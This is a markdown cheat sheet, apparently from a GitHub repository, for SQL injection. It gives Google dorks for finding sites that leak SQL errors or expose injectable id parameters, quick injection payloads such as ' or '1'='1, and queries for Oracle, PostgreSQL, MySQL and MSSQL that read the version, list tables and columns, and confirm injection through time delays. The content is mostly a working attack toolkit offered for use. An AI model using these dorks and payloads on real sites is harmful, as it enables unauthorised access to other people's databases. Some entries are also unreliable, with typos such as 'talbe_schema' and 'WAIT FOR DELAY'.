Skip to content

Latest commit

 

History

History
167 lines (128 loc) · 2.92 KB

sqli.md

File metadata and controls

167 lines (128 loc) · 2.92 KB
Raw

SQL injections

SQLi Google Dorks

intext:"error in your SQL syntax"
intext:"mysql_num_rows()" 
in****:"mysql_fetch_array()" 
in****:"Error Occurred While Processing Request" 
in****:"Server Error in '/' Application" 
in****:"Microsoft OLE DB Provider for ODBC Drivers error" 
in****:"InvalidQuerystring" 
in****:"OLE DB Provider for ODBC" 
in****:"VBScript Runtime" 
in****:"ADODB.Field" 
in****:"BOF or EOF" 
in****:"ADODB.Command" 
in****:"JET Database" 
in****:"mysql_fetch_row()" 
in****:"Syntax error" 
in****:"include()" 
in****:"mysql_fetch_assoc()" 
in****:"mysql_fetch_object()" 
in****:"mysql_numrows()" 
in****:"GetArray()" 
in****:"FetchRow()" 
in****:"Input string was not in a correct format" 
inurl:/id= intext:"You have an error in your SQL syntax" 
inurl:”main.php?t=
inurl:”games.php?id=
inurl:”guide.php?id=
inurl:”index.php?cat=
allinurl:”review.php?sid=
inurl:”index2.php?id=
inurl:”main.php?id=
inurl:zoom.php?id=site:.il
inurl:”details.php?id=
inurl:”?came=
inurl:”index.php?page=
inurl:”home.php?cat=
inurl:”index2.php?id=

Quick Payloads

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='

Oracle

  • Finding version
SELECT * FROM v$version;
SELECT * FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE rownum=1
  • Finding tables
SELECT table_name FROM all_tables
  • Finding columns for every table
SELECT table_name, column_name FROM all_tab_columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
BEGIN DBMS_LOCK.SLEEP(seconds); END;

Postgres SQL

  • Finding version
SELECT version()
  • Finding tables
SELECT table_schema,table_name FROM information_schema.tables
SELECT tablename from pg_tables
  • Finding columns for every table
SELECT table_schema,table_name,column_name FROM information_schema.columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
PG_SLEEP(seconds)

MySQL

  • Finding version
SELECT @@ version
  • Finding tables
SELECT table_schema,table_name FROM information_schema.tables
  • Finding columns for every table
SELECT talbe_schema,table_name,column_name FROM information_schema.columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
SLEEP(seconds)

MSSQL

  • Finding version
SELECT @@ version
  • Finding tables
SELECT table_schema,table_name FROM information_schema.tables
SELECT name FROM sysobjects WHERE xtype = 'U' --
  • Finding columns for every table
SELECT table_schema,table_name,column_name FROM information_schema.columns
  • Inducing Time Delay to determine if the application is vulnerable to SQLi
WAIT FOR DELAY '00:00:SS'